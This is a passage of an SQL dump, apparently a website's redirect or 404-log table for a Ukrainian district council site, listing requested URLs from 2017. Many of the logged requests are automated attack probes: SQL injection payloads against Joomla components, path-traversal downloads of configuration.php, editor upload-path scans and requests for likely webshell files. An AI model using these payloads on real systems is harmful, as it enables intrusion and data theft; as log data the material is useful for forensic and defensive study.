ñ‚ñ€ð°ð½ñ ð¿ð¾ñ€ñ‚ð½ð¸ñ… ð¿ñ–ð´ð¿ñ€..pdf',NULL,'','',2,0,'2017-07-04 16:43:18','0000-00-00 00:00:00',301),(30787,'http://www.malyn-rayrada.gov.ua/wp-content/plugins/revslider/temp/update_extract/conf.php',NULL,'http://www.malyn-rayrada.gov.ua/wp-content/plugins/revslider/temp/update_extract/conf.php','',1,0,'2017-07-06 15:26:39','0000-00-00 00:00:00',301),(30788,'http://www.malyn-rayrada.gov.ua/images/jlogo.php',NULL,'http://www.malyn-rayrada.gov.ua/images/jlogo.php','',1,0,'2017-07-08 04:31:21','0000-00-00 00:00:00',301),(30789,'http://malyn-rayrada.gov.ua/fck/',NULL,'','',2,0,'2017-07-08 08:16:39','0000-00-00 00:00:00',301),(30790,'http://malyn-rayrada.gov.ua/fckeditor/',NULL,'','',2,0,'2017-07-08 08:16:40','0000-00-00 00:00:00',301),(30791,'http://malyn-rayrada.gov.ua/admin/fck/',NULL,'','',1,0,'2017-07-08 08:16:42','0000-00-00 00:00:00',301),(30792,'http://malyn-rayrada.gov.ua/admin/fckeditor/',NULL,'','',1,0,'2017-07-08 08:16:42','0000-00-00 00:00:00',301),(30793,'http://malyn-rayrada.gov.ua/ckeditor/',NULL,'','',1,0,'2017-07-08 08:16:43','0000-00-00 00:00:00',301),(30794,'http://malyn-rayrada.gov.ua/common/fckeditor/',NULL,'','',1,0,'2017-07-08 08:16:43','0000-00-00 00:00:00',301),(30795,'http://malyn-rayrada.gov.ua/editor/',NULL,'','',1,0,'2017-07-08 08:16:45','0000-00-00 00:00:00',301),(30796,'http://malyn-rayrada.gov.ua/editor/fckeditor/',NULL,'','',1,0,'2017-07-08 08:16:46','0000-00-00 00:00:00',301),(30797,'http://malyn-rayrada.gov.ua/editor1/',NULL,'','',1,0,'2017-07-08 08:16:46','0000-00-00 00:00:00',301),(30798,'http://malyn-rayrada.gov.ua/editorold/',NULL,'','',1,0,'2017-07-08 08:16:47','0000-00-00 00:00:00',301),(30799,'http://malyn-rayrada.gov.ua/fckimg/',NULL,'','',1,0,'2017-07-08 08:16:49','0000-00-00 00:00:00',301),(30800,'http://malyn-rayrada.gov.ua/images/upload/fckeditor/',NULL,'','',1,0,'2017-07-08 08:16:50','0000-00-00 00:00:00',301),(30801,'http://malyn-rayrada.gov.ua/images/upload/fckediter/',NULL,'','',1,0,'2017-07-08 08:16:50','0000-00-00 00:00:00',301),(30802,'http://malyn-rayrada.gov.ua/images/upload/fckimg/',NULL,'','',1,0,'2017-07-08 08:16:51','0000-00-00 00:00:00',301),(30803,'http://malyn-rayrada.gov.ua/inc/fckeditor/',NULL,'','',1,0,'2017-07-08 08:16:51','0000-00-00 00:00:00',301),(30804,'http://malyn-rayrada.gov.ua/include/fckeditor/',NULL,'','',1,0,'2017-07-08 08:16:52','0000-00-00 00:00:00',301),(30805,'http://malyn-rayrada.gov.ua/includes/fckeditor/',NULL,'','',1,0,'2017-07-08 08:16:53','0000-00-00 00:00:00',301),(30806,'http://malyn-rayrada.gov.ua/js/fckeditor/',NULL,'','',1,0,'2017-07-08 08:16:54','0000-00-00 00:00:00',301),(30807,'http://malyn-rayrada.gov.ua/manage/fckeditor/',NULL,'','',1,0,'2017-07-08 08:16:56','0000-00-00 00:00:00',301),(30808,'http://malyn-rayrada.gov.ua/scripts/fckeditor/',NULL,'','',1,0,'2017-07-08 08:16:57','0000-00-00 00:00:00',301),(30809,'http://malyn-rayrada.gov.ua/sysadmin/fckeditor/',NULL,'','',1,0,'2017-07-08 08:16:57','0000-00-00 00:00:00',301),(30810,'http://malyn-rayrada.gov.ua/system/fckeditor/',NULL,'','',1,0,'2017-07-08 08:16:58','0000-00-00 00:00:00',301),(30811,'http://malyn-rayrada.gov.ua/upload/fckeditor/',NULL,'','',1,0,'2017-07-08 08:16:58','0000-00-00 00:00:00',301),(30812,'http://malyn-rayrada.gov.ua/upload/fckediter/',NULL,'','',1,0,'2017-07-08 08:16:59','0000-00-00 00:00:00',301),(30813,'http://malyn-rayrada.gov.ua//plugins/content/fsave/download.php?filename=configuration.php',NULL,'','',1,0,'2017-07-08 08:18:20','0000-00-00 00:00:00',301),(30814,'http://malyn-rayrada.gov.ua/index.php?option=com_jetext&task=download&file=[../../index.php]',NULL,'','',1,0,'2017-07-08 08:18:55','0000-00-00 00:00:00',301),(30815,'http://malyn-rayrada.gov.ua/index.php?option=com_cckjseblod&task=download&file=configuration.php',NULL,'','',1,0,'2017-07-08 08:18:55','0000-00-00 00:00:00',301),(30816,'http://malyn-rayrada.gov.ua//index.php?option=com_vikbooking&view=availability&room_ids[0]=\'',NULL,'','',1,0,'2017-07-08 08:18:56','0000-00-00 00:00:00',301),(30817,'http://malyn-rayrada.gov.ua//index.php?option=com_onismusic&view=songs&tag=\' and select md5(1)&lang=es',NULL,'','',1,0,'2017-07-08 08:18:56','0000-00-00 00:00:00',301),(30818,'http://malyn-rayrada.gov.ua//index.php?option=com_soccerbet&view=matches&cat=\'',NULL,'','',1,0,'2017-07-08 08:18:56','0000-00-00 00:00:00',301),(30819,'http://malyn-rayrada.gov.ua//index.php?option=com_onisquotes&view=quotes&tag=\'&itemid=180',NULL,'','',1,0,'2017-07-08 08:18:57','0000-00-00 00:00:00',301),(30820,'http://malyn-rayrada.gov.ua//index.php?option=com_jembedall&downloadfree=4\'',NULL,'','',1,0,'2017-07-08 08:18:59','0000-00-00 00:00:00',301),(30821,'http://malyn-rayrada.gov.ua//index.php?option=com_sponsorwall&task=click&wallid=\'',NULL,'','',1,0,'2017-07-08 08:19:00','0000-00-00 00:00:00',301),(30822,'http://malyn-rayrada.gov.ua//index.php?option=com_onispetitions&view=petitions&tag=\'',NULL,'','',1,0,'2017-07-08 08:19:03','0000-00-00 00:00:00',301),(30823,'http://malyn-rayrada.gov.ua//index.php?option=com_soccerbet&view=userbethistory&userid=\'',NULL,'','',2,0,'2017-07-08 08:19:07','0000-00-00 00:00:00',301),(30824,'http://malyn-rayrada.gov.ua//index.php?option=com_joominaflileselling&view=dargahpardakht&id=1\'',NULL,'','',1,0,'2017-07-08 08:19:10','0000-00-00 00:00:00',301),(30825,'http://malyn-rayrada.gov.ua//index.php?option=com_jetour&view=package&cid=\'',NULL,'','',1,0,'2017-07-08 08:19:10','0000-00-00 00:00:00',301),(30826,'http://malyn-rayrada.gov.ua//index.php?option=com_maqmahelpdesk&task=pdf_kb&id=\'',NULL,'','',1,0,'2017-07-08 08:19:13','0000-00-00 00:00:00',301),(30827,'http://malyn-rayrada.gov.ua//index.php?option=com_docmanpaypal&task=addtocart&id=\'',NULL,'','',1,0,'2017-07-08 08:19:13','0000-00-00 00:00:00',301),(30828,'http://malyn-rayrada.gov.ua//index.php?option=com_joomloc&view=loc&layout=singleloc&site_id=\'',NULL,'','',1,0,'2017-07-08 08:19:14','0000-00-00 00:00:00',301),(30829,'http://malyn-rayrada.gov.ua//index.php?option=com_eshop&view=category&id=\'',NULL,'','',1,0,'2017-07-08 08:19:14','0000-00-00 00:00:00',301),(30830,'http://malyn-rayrada.gov.ua//index.php?option=com_osservicesbooking&task=default_showmap&vid=\'',NULL,'','',1,0,'2017-07-08 08:19:15','0000-00-00 00:00:00',301),(30831,'http://malyn-rayrada.gov.ua//index.php?option=com_awdwall&task=gethovercard&wuid=\'',NULL,'','',1,0,'2017-07-08 08:19:17','0000-00-00 00:00:00',301),(30832,'http://malyn-rayrada.gov.ua//index.php?option=com_osproperty&view=ltype&catids[0]=\'',NULL,'','',1,0,'2017-07-08 08:19:18','0000-00-00 00:00:00',301),(30833,'http://malyn-rayrada.gov.ua//index.php?option=com_bazaar&view=productsearch&searchproduct=a&category=\'',NULL,'','',1,0,'2017-07-08 08:19:18','0000-00-00 00:00:00',301),(30834,'http://malyn-rayrada.gov.ua//index.php?option=com_joomloc&view=engine&layout=geo&liste=65&place=dep&ville=\'',NULL,'','',1,0,'2017-07-08 08:19:20','0000-00-00 00:00:00',301),(30835,'http://malyn-rayrada.gov.ua//index.php?filter_a1search=ihsan_sencan&filter_a1type=0&filter_a1minprice=&filter_a1maxprice=&filter_a1locality=0&filter_a1minbed=0&filter_a1minbaths=&filter_a1minarea=\'',NULL,'','',1,0,'2017-07-08 08:19:22','0000-00-00 00:00:00',301),(30836,'http://malyn-rayrada.gov.ua//index.php?option=com_jeclassifyads&view=item_detail&pro_id=\'',NULL,'','',1,0,'2017-07-08 08:19:25','0000-00-00 00:00:00',301),(30837,'http://malyn-rayrada.gov.ua//index.php?option=com_spidercalendar&view=spidercalendar&calendar_id=\'',NULL,'','',1,0,'2017-07-08 08:19:26','0000-00-00 00:00:00',301),(30838,'http://malyn-rayrada.gov.ua//index.php?option=com_spidercatalog&product_id=40&view=showproduct&page_num=1&back=1&show_category_details=0&display_type=list&show_subcategories=0&show_subcategories_products=0&show_products=1&select_categories=0&itemid=\'',NULL,'','',1,0,'2017-07-08 08:19:28','0000-00-00 00:00:00',301),(30839,'http://malyn-rayrada.gov.ua//index.php?option=com_jedirectory&view=item_detail&ditemid=\'',NULL,'','',1,0,'2017-07-08 08:19:30','0000-00-00 00:00:00',301),(30840,'http://malyn-rayrada.gov.ua//index.php?option=com_jequoteform&view=form&itemid=\'',NULL,'','',1,0,'2017-07-08 08:19:30','0000-00-00 00:00:00',301),(30841,'http://malyn-rayrada.gov.ua//index.php?option=com_spiderfacebook&task=loginwith&name=\'',NULL,'','',1,0,'2017-07-08 08:19:31','0000-00-00 00:00:00',301),(30842,'http://malyn-rayrada.gov.ua//index.php?option=com_spiderfaq&view=spiderfaqmultiple&standcat=0&faq_cats=,2,3,&standcatids=&theme=1&searchform=1&expand=0&itemid=\'',NULL,'','',1,0,'2017-07-08 08:19:31','0000-00-00 00:00:00',301),(30843,'http://malyn-rayrada.gov.ua//index.php?option=com_jepropertyfinder&view=userprofile&userid=\'',NULL,'','',1,0,'2017-07-08 08:19:32','0000-00-00 00:00:00',301),(30844,'http://malyn-rayrada.gov.ua//index.php?option=com_jevideorate&view=video&cat_id=\'',NULL,'','',1,0,'2017-07-08 08:19:32','0000-00-00 00:00:00',301),(30845,'http://malyn-rayrada.gov.ua//index.php?option=com_jeauto&view=item_detail&d_itemid=\'',NULL,'','',1,0,'2017-07-08 08:19:33','0000-00-00 00:00:00',301),(30846,'http://malyn-rayrada.gov.ua//index.php?option=com_jsplocation&task=directionview&id=\'',NULL,'','',2,0,'2017-07-08 08:19:33','0000-00-00 00:00:00',301),(30847,'http://malyn-rayrada.gov.ua//index.php?option=com_jeawdsong&view=song_detail&id=\'',NULL,'','',1,0,'2017-07-08 08:19:33','0000-00-00 00:00:00',301),(30848,'http://malyn-rayrada.gov.ua//index.php?option=com_jeauction&view=event_detail&eid=\'',NULL,'','',1,0,'2017-07-08 08:19:34','0000-00-00 00:00:00',301),(30849,'http://malyn-rayrada.gov.ua//index.php?option=com_hbooking&view=roomlisting&temp=hotel&h_id=\'',NULL,'','',1,0,'2017-07-08 08:19:34','0000-00-00 00:00:00',301),(30850,'http://malyn-rayrada.gov.ua//index.php?option=com_recipe&view=recipes&task=print_ingred&id=\'',NULL,'','',1,0,'2017-07-08 08:19:35','0000-00-00 00:00:00',301),(30851,'http://malyn-rayrada.gov.ua//index.php?option=com_jequizmanagement&view=question&eid=\'',NULL,'','',1,0,'2017-07-08 08:19:35','0000-00-00 00:00:00',301),(30852,'http://malyn-rayrada.gov.ua//index.php?option=com_jegridfolio&view=category_detail&id=\'',NULL,'','',1,0,'2017-07-08 08:19:36','0000-00-00 00:00:00',301),(30853,'http://malyn-rayrada.gov.ua//index.php?option=com_jemessenger&view=box_detail&folder=inbox&task=edit&itemid=1496&cid[0]=\'',NULL,'','',1,0,'2017-07-08 08:19:36','0000-00-00 00:00:00',301),(30854,'http://malyn-rayrada.gov.ua//index.php?option=com_jeticket&view=assign_detail&cid[0]=\'',NULL,'','',1,0,'2017-07-08 08:19:37','0000-00-00 00:00:00',301),(30855,'http://malyn-rayrada.gov.ua//index.php?option=com_jeportfolio&view=item_detail&d_itemid=\'',NULL,'','',1,0,'2017-07-08 08:19:38','0000-00-00 00:00:00',301),(30856,'http://malyn-rayrada.gov.ua//guessers?type=\'',NULL,'','',1,0,'2017-07-08 08:19:39','0000-00-00 00:00:00',301),(30857,'http://malyn-rayrada.gov.ua//index.php?option=com_abstract&view=conferences&layout=detail&pid=\'',NULL,'','',1,0,'2017-07-08 08:19:41','0000-00-00 00:00:00',301),(30858,'http://malyn-rayrada.gov.ua//index.php?option=com_streetguess&view=leaderboard&id=\'',NULL,'','',1,0,'2017-07-08 08:19:42','0000-00-00 00:00:00',301),(30859,'http://malyn-rayrada.gov.ua//index.php?option=com_jeformcr&view=form&itemid=\'',NULL,'','',1,0,'2017-07-08 08:19:43','0000-00-00 00:00:00',301),(30860,'http://malyn-rayrada.gov.ua//index.php?option=com_jek2storymultipleform&view=jesubmit&itemid=\'',NULL,'','',1,0,'2017-07-08 08:19:45','0000-00-00 00:00:00',301),(30861,'http://malyn-rayrada.gov.ua//index.php?option=com_jtagcalendar&format=raw&noframe=1&search=\'&searchonly=1',NULL,'','',1,0,'2017-07-08 08:19:54','0000-00-00 00:00:00',301),(30862,'http://malyn-rayrada.gov.ua/index.php/weblinks-categories?id=0 ) union select md5(3.1415)-- )',NULL,'','',1,0,'2017-07-08 08:20:14','0000-00-00 00:00:00',301),(30863,'http://malyn-rayrada.gov.ua/index.php?option=com_s5clanroster&view=s5clanroster&layout=category&task=category&id=-null\'+/*!50000union*/+/*!50000select*/md5(3.1415),222-- -',NULL,'','',1,0,'2017-07-08 08:20:15','0000-00-00 00:00:00',301),(30864,'http://malyn-rayrada.gov.ua/index.php?option=com_pccookbook&page=viewuserrecipes&user_id=-9999999+union+select+md5(3.1415)--',NULL,'','',1,0,'2017-07-08 08:20:16','0000-00-00 00:00:00',301),(30865,'http://malyn-rayrada.gov.ua/index.php?categoryid=1&controller=deal&keyword=1&locationid=1&option=com_enmasse&sortby=117 and(select 1 from(select count(*),concat((select (select (select mid(md5(3.1415),1,16)) ) from `information_schema`.tables limit 0,1),floor(rand(0)*2))x from `information_schema`.tables group by x)a) and 1=1',NULL,'','',1,0,'2017-07-08 08:20:17','0000-00-00 00:00:00',301),(30866,'http://malyn-rayrada.gov.ua/index.php?option=com_vnmshop&catid=113 limit 0,1 union all select null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,md5(3.1415),null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null',NULL,'','',1,0,'2017-07-08 08:20:19','0000-00-00 00:00:00',301),(30867,'http://malyn-rayrada.gov.ua/index.php?option=com_job&controller=listcategory&task=viewjob&id_job=-1+union+all+select+1,md5(3.1415),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42--',NULL,'','',1,0,'2017-07-08 08:20:22','0000-00-00 00:00:00',301),(30868,'http://malyn-rayrada.gov.ua/index.php?tmpl=component&option=com_redshop&view=product&task=addtocompare&pid=24\" and 1=0 union select 1,2,3,4,5,6,7,8,md5(3.1415),10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63#&cmd=add&cid=20&sid=0.6886686905513422',NULL,'','',1,0,'2017-07-08 08:20:30','0000-00-00 00:00:00',301),(30869,'http://malyn-rayrada.gov.ua/index.php?option=com_memorix&task=result&searchplugin=theme&itemid=60&themeid=-8594+union+select+111,222,md5(3.1415),444,555,666,777,888,999--+abuhassan',NULL,'','',1,0,'2017-07-08 08:20:34','0000-00-00 00:00:00',301),(30870,'http://malyn-rayrada.gov.ua/index.php?option=com_ebcontent&view=article&tmpl=component&id=md5(3.1415)&cid=9&print=',NULL,'','',2,0,'2017-07-08 08:20:45','0000-00-00 00:00:00',301),(30871,'http://malyn-rayrada.gov.ua//index.php?option=com_subcategory&id=20+union+select+md5(3.1415)--',NULL,'','',1,0,'2017-07-08 08:20:48','0000-00-00 00:00:00',301),(30872,'http://malyn-rayrada.gov.ua/index.php?option=com_contactformmaker&view=contactformmaker&id=1 and (select 1222 from(select count(*),concat(md5(3.1415),floor (rand(0)*2))x from information_schema.character_sets group by x)a)--+',NULL,'','',1,0,'2017-07-08 08:20:52','0000-00-00 00:00:00',301),(30873,'http://malyn-rayrada.gov.ua//index.php?option=com_hotproperty&task=asearch&item id=27&search_id=2&itemid=\'',NULL,'','',1,0,'2017-07-08 08:21:10','0000-00-00 00:00:00',301),(30874,'http://malyn-rayrada.gov.ua/index.php?option=com_jomestate&task=print&id=md5(3.1415)&cid=9&print=',NULL,'','',1,0,'2017-07-08 08:21:23','0000-00-00 00:00:00',301),(30875,'http://malyn-rayrada.gov.ua/images/jlogo.php',NULL,'http://malyn-rayrada.gov.ua/images/jlogo.php','',1,0,'2017-07-08 12:44:55','0000-00-00 00:00:00',301),(30876,'http://www.malyn-rayrada.gov.ua/modules/mod_jmodule/index.html',NULL,'http://www.malyn-rayrada.gov.ua/modules/mod_jmodule/index.html','',1,0,'2017-07-10 16:22:12','0000-00-00 00:00:00',301),(30877,'http://malyn-rayrada.gov.ua/modules/mod_jmodule/index.html',NULL,'http://malyn-rayrada.gov.ua/modules/mod_jmodule/index.html','',1,0,'2017-07-10 23:53:19','0000-00-00 00:00:00',301),(30878,'http://malyn-rayrada.gov.ua/616a7cdd-eb77-4ecb-9a58-fd4ab7c385af',NULL,'','',1,0,'2017-07-11 06:21:00','0000-00-00 00:00:00',301),(30879,'http://malyn-rayrada.gov.ua/attachments/article/1481/ð¾ð±ñ”ð´ð½ð°ð½ð½ñ .pdf',NULL,'','',1,0,'2017-07-11 13:17:50','0000-00-00 00:00:00',301),(30880,'http://www.malyn-rayrada.gov.ua/modules/mod_j2module/index.html',NULL,'http://www.malyn-rayrada.gov.ua/modules/mod_j2module/index.html','',2,0,'2017-07-12 04:08:24','0000-00-00 00:00:00',301),(30881,'http://www.malyn-rayrada.gov.ua/index.php/view/img/favicon.png',NULL,'','',6,0,'2017-07-12 12:02:26','0000-00-00 00:00:00',301),(30882,'http://www.malyn-rayrada.gov.ua/index.php/images/icon1.png',NULL,'','',10,0,'2017-07-12 12:04:20','0000-00-00 00:00:00',301),(30883,'http://www.malyn-rayrada.gov.ua/index.php/images/icon3.png',NULL,'','',5,0,'2017-07-12 12:04:21','0000-00-00 00:00:00',301),(30884,'http://www.malyn-rayrada.gov.ua/index.php/images/header.jpg',NULL,'','',5,0,'2017-07-12 12:04:22','0000-00-00 00:00:00',301),(30885,'http://www.malyn-rayrada.gov.ua/index.php/themes/bootstrap.css',NULL,'','',6,0,'2017-07-12 12:05:02','0000-00-00 00:00:00',301),(30886,'http://www.malyn-rayrada.gov.ua/index.php/phpinfo.php',NULL,'','',6,0,'2017-07-12 12:05:03','0000-00-00 00:00:00',301),(30887,'http://www.malyn-rayrada.gov.ua/zxcvbnm.php?hjjjf',NULL,'http://www.malyn-rayrada.gov.ua/zxcvbnm.php?hjjjf','',1,0,'2017-07-12 16:02:07','0000-00-00 00:00:00',301),(30888,'http://malyn-rayrada.gov.ua/modules/mod_j2module/index.html',NULL,'http://malyn-rayrada.gov.ua/modules/mod_j2module/index.html','',1,0,'2017-07-12 20:25:20','0000-00-00 00:00:00',301),(30889,'http://www.malyn-rayrada.gov.ua/attachments/article/1481/ð¾ð±ñ”ð´ð½ð°ð½ð½ñ .pdf',NULL,'','',1,0,'2017-07-13 12:16:19','0000-00-00 00:00:00',301),(30890,'http://malyn-rayrada.gov.ua/wp-admin',NULL,'http://malyn-rayrada.gov.ua','',2,0,'2017-07-17 12:48:15','0000-00-00 00:00:00',301),(30891,'http://malyn-rayrada.gov.ua/wp-content/uploads/8d4ce2947aa0c44.php',NULL,'','',1,0,'2017-07-18 20:06:58','0000-00-00 00:00:00',301),(30892,'http://malyn-rayrada.gov.ua/static/js/tiny_mce/plugins/tinybrowser/upload.php?type=file/wp-login.php',NULL,'','',1,0,'2017-07-18 20:06:59','0000-00-00 00:00:00',301),(30893,'http://malyn-rayrada.gov.ua/admin/lib/tiny_mce/plugins/tinybrowser/upload.php?type=file/wp-login.php',NULL,'','',1,0,'2017-07-18 20:06:59','0000-00-00 00:00:00',301),(30894,'http://malyn-rayrada.gov.ua/tiny_mce/plugins/tinybrowser/upload.php?type=file/wp-login.php',NULL,'','',1,0,'2017-07-18 20:07:01','0000-00-00 00:00:00',301),(30895,'http://malyn-rayrada.gov.ua/editors/tinymce/jscripts/tiny_mce/plugins/tinybrowser/upload.php?type=file/wp-login.php',NULL,'','',1,0,'2017-07-18 20:07:02','0000-00-00 00:00:00',301),(30896,'http://www.malyn-rayrada.gov.ua/modules/mod_articless/html.php',NULL,'http://www.malyn-rayrada.gov.ua/modules/mod_articless/html.php','',1,0,'2017-07-19 02:55:42','0000-00-00 00:00:00',301),(30897,'http://malyn-rayrada.gov.ua/62e0e0b3-7b33-44e8-90cf-f023884abf67',NULL,'','',1,0,'2017-07-19 03:56:57','0000-00-00 00:00:00',301),(30898,'http://malyn-rayrada.gov.ua/modules/mod_articless/html.php',NULL,'http://malyn-rayrada.gov.ua/modules/mod_articless/html.php','',1,0,'2017-07-19 06:26:59','0000-00-00 00:00:00',301),(30899,'http://malyn-rayrada.gov.ua/attachments/article/1482/ð¿ñ€ð¾ñ‚ð¾ðºð¾ð» 1.pdf',NULL,'','',1,0,'2017-07-19 12:27:57','0000-00-00 00:00:00',301),(30900,'http://www.malyn-rayrada.gov.ua/modules/mod_articless/mod_articless.php',NULL,'http://www.malyn-rayrada.gov.ua/modules/mod_articless/mod_articless.php','',1,0,'2017-07-19 14:31:29','0000-00-00 00:00:00',301),(30901,'http://www.malyn-rayrada.gov.ua/modules/mod_ariimageslidersa/mod_ariimageslidersa.php',NULL,'http://www.malyn-rayrada.gov.ua/modules/mod_ariimageslidersa/mod_ariimageslidersa.php','',1,0,'2017-07-19 15:08:29','0000-00-00 00:00:00',301),(30902,'http://malyn-rayrada.gov.ua/attachments/article/1482/ð¿ñ€ð¾ñ‚ð¾ðºð¾ð» 2.pdf',NULL,'','',1,0,'2017-07-19 17:15:41','0000-00-00 00:00:00',301),(30903,'http://malyn-rayrada.gov.ua/modules/mod_articless/mod_articless.php',NULL,'http://malyn-rayrada.gov.ua/modules/mod_articless/mod_articless.php','',1,0,'2017-07-19 18:57:57','0000-00-00 00:00:00',301),(30904,'http://malyn-rayrada.gov.ua/modules/mod_ariimageslidersa/mod_ariimageslidersa.php',NULL,'http://malyn-rayrada.gov.ua/modules/mod_ariimageslidersa/mod_ariimageslidersa.php','',1,0,'2017-07-19 20:02:18','0000-00-00 00:00:00',301),(30905,'http://www.malyn-rayrada.gov.ua/modules/mod_araticlhess/mod_araticlhess.php',NULL,'http://www.malyn-rayrada.gov.ua/modules/mod_araticlhess/mod_araticlhess.php','',1,0,'2017-07-20 15:18:10','0000-00-00 00:00:00',301),(30906,'http://malyn-rayrada.gov.ua/modules/mod_araticlhess/mod_araticlhess.php',NULL,'http://malyn-rayrada.gov.ua/modules/mod_araticlhess/mod_araticlhess.php','',1,0,'2017-07-20 19:38:23','0000-00-00 00:00:00',301),(30907,'http://www.malyn-rayrada.gov.ua/attachments/article/1436/ð”ðµðºð»ð°ñ€ð°ñ†ñ–ñ— ñ ñ–ð»ñœñ ñœðºñ– ñ€ð°ð´ð¸1.pdf',NULL,'','',1,0,'2017-07-23 09:24:26','0000-00-00 00:00:00',301),(30908,'http://www.malyn-rayrada.gov.ua/attachments/article/1506/ðÿñ–ð´ñ ñƒð¼ðºð¸ ð²ñ–ð´ðºñ€ð¸ñ‚ð¾ð³ð¾ ð¿ð¾ñ–ð¼ðµð½ð½ð¾ð³ð¾ ð³ð¾ð»ð¾ñ ñƒð²ð°ð½ð½ñ  8 ñ ðµñ ñ–ñ .pdf',NULL,'','',1,0,'2017-07-24 22:53:25','0000-00-00 00:00:00',301),(30909,'http://malyn-rayrada.gov.ua/9ed74c31-96c6-4df9-9d56-914fdbdeda3f',NULL,'','',1,0,'2017-07-26 14:41:50','0000-00-00 00:00:00',301),(30910,'http://www.malyn-rayrada.gov.ua/wp/beta/wp-admin/setup-config.php',NULL,'','',1,0,'2017-07-27 14:51:20','0000-00-00 00:00:00',301),(30911,'http://www.malyn-rayrada.gov.ua/blog/beta/wp-admin/setup-config.php',NULL,'','',1,0,'2017-07-27 14:51:21','0000-00-00 00:00:00',301),(30912,'http://www.malyn-rayrada.gov.ua/home/wp-admin/setup-config.php',NULL,'','',1,0,'2017-07-27 14:51:21','0000-00-00 00:00:00',301),(30913,'http://www.malyn-rayrada.gov.ua/site/wp-admin/setup-config.php',NULL,'','',1,0,'2017-07-27 14:51:21','0000-00-00 00:00:00',301),(30914,'http://www.malyn-rayrada.gov.ua/wordpress/beta/wp-admin/setup-config.php',NULL,'','',1,0,'2017-07-27 14:51:22','0000-00-00 00:00:00',301),(30915,'http://malyn-rayrada.gov.ua/index.php/1779-plan-grafik-provedennya-zasidan-postijnikh-komisij-malinskoji-rajonnoji-radi-po-rozglyadu-pitan-yaki-vinosyatsya-na-18-sesiyu-rajonnoji-radi-7-sklikannya',NULL,'','',49,0,'2017-07-28 15:48:00','0000-00-00 00:00:00',301),(30916,'http://www.malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/1708-pro-zatverdzhennya-poryadku-obliku-vitrat-transportnikh-pidpriemstv-pilgovikh-kategorij-gromadyan-za-rakhunok-vidatkiv-z-mistsevogo-byudzhetu',NULL,'','',38,0,'2017-07-29 23:56:39','0000-00-00 00:00:00',301),(30917,'http://malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/1708-pro-zatverdzhennya-poryadku-obliku-vitrat-transportnikh-pidpriemstv-pilgovikh-kategorij-gromadyan-za-rakhunok-vidatkiv-z-mistsevogo-byudzhetu',NULL,'','',29,0,'2017-07-30 05:55:30','0000-00-00 00:00:00',301),(30918,'http://www.malyn-rayrada.gov.ua/modules/mod_mapsapi/mod_mapsapi.php',NULL,'http://www.malyn-rayrada.gov.ua/modules/mod_mapsapi/mod_mapsapi.php','',1,0,'2017-07-30 09:40:42','0000-00-00 00:00:00',301),(30919,'http://malyn-rayrada.gov.ua/modules/mod_mapsapi/mod_mapsapi.php',NULL,'http://malyn-rayrada.gov.ua/modules/mod_mapsapi/mod_mapsapi.php','',1,0,'2017-07-30 14:54:43','0000-00-00 00:00:00',301),(30920,'http://www.malyn-rayrada.gov.ua/modules/mod_msn/mod_msn.php',NULL,'http://www.malyn-rayrada.gov.ua/modules/mod_msn/mod_msn.php','',1,0,'2017-07-31 03:53:11','0000-00-00 00:00:00',301),(30921,'http://malyn-rayrada.gov.ua/modules/mod_msn/mod_msn.php',NULL,'http://malyn-rayrada.gov.ua/modules/mod_msn/mod_msn.php','',1,0,'2017-07-31 09:14:24','0000-00-00 00:00:00',301),(30922,'http://www.malyn-rayrada.gov.ua/modules/mod_backup2/mod_backup2.php',NULL,'http://www.malyn-rayrada.gov.ua/modules/mod_backup2/mod_backup2.php','',1,0,'2017-07-31 14:09:33','0000-00-00 00:00:00',301),(30923,'http://malyn-rayrada.gov.ua/modules/mod_backup2/mod_backup2.php',NULL,'http://malyn-rayrada.gov.ua/modules/mod_backup2/mod_backup2.php','',1,0,'2017-07-31 19:37:56','0000-00-00 00:00:00',301),(30924,'http://www.malyn-rayrada.gov.ua/modules/mod_ya/mod_ya.php',NULL,'http://www.malyn-rayrada.gov.ua/modules/mod_ya/mod_ya.php','',1,0,'2017-08-01 03:36:20','0000-00-00 00:00:00',301),(30925,'http://malyn-rayrada.gov.ua/modules/mod_ya/mod_ya.php',NULL,'http://malyn-rayrada.gov.ua/modules/mod_ya/mod_ya.php','',1,0,'2017-08-01 08:57:52','0000-00-00 00:00:00',301),(30926,'http://www.malyn-rayrada.gov.ua/modules/mod_ariimageesws/mod_ariimageesws.php',NULL,'http://www.malyn-rayrada.gov.ua/modules/mod_ariimageesws/mod_ariimageesws.php','',1,0,'2017-08-01 16:25:08','0000-00-00 00:00:00',301),(30927,'http://malyn-rayrada.gov.ua/modules/mod_ariimageesws/mod_ariimageesws.php',NULL,'http://malyn-rayrada.gov.ua/modules/mod_ariimageesws/mod_ariimageesws.php','',1,0,'2017-08-01 21:43:10','0000-00-00 00:00:00',301),(30928,'http://www.malyn-rayrada.gov.ua/modules/mod_ariimageslider/html.php',NULL,'http://www.malyn-rayrada.gov.ua/modules/mod_ariimageslider/html.php','',1,0,'2017-08-02 12:23:29','0000-00-00 00:00:00',301),(30929,'http://malyn-rayrada.gov.ua/modules/mod_ariimageslider/html.php',NULL,'http://malyn-rayrada.gov.ua/modules/mod_ariimageslider/html.php','',1,0,'2017-08-02 19:18:59','0000-00-00 00:00:00',301),(30930,'http://malyn-rayrada.gov.ua/admin/index.php',NULL,'','',4,0,'2017-08-03 20:29:30','0000-00-00 00:00:00',301),(30931,'http://malyn-rayrada.gov.ua/modules/mod_system/mod_system.php',NULL,'http://malyn-rayrada.gov.ua/modules/mod_system/mod_system.php','',1,0,'2017-08-04 19:59:35','0000-00-00 00:00:00',301),(30932,'http://www.malyn-rayrada.gov.ua/index.php/1779-plan-grafik-provedennya-zasidan-postijnikh-komisij-malinskoji-rajonnoji-radi-po-rozglyadu-pitan-yaki-vinosyatsya-na-18-sesiyu-rajonnoji-radi-7-sklikannya',NULL,'','',31,0,'2017-08-04 21:27:07','0000-00-00 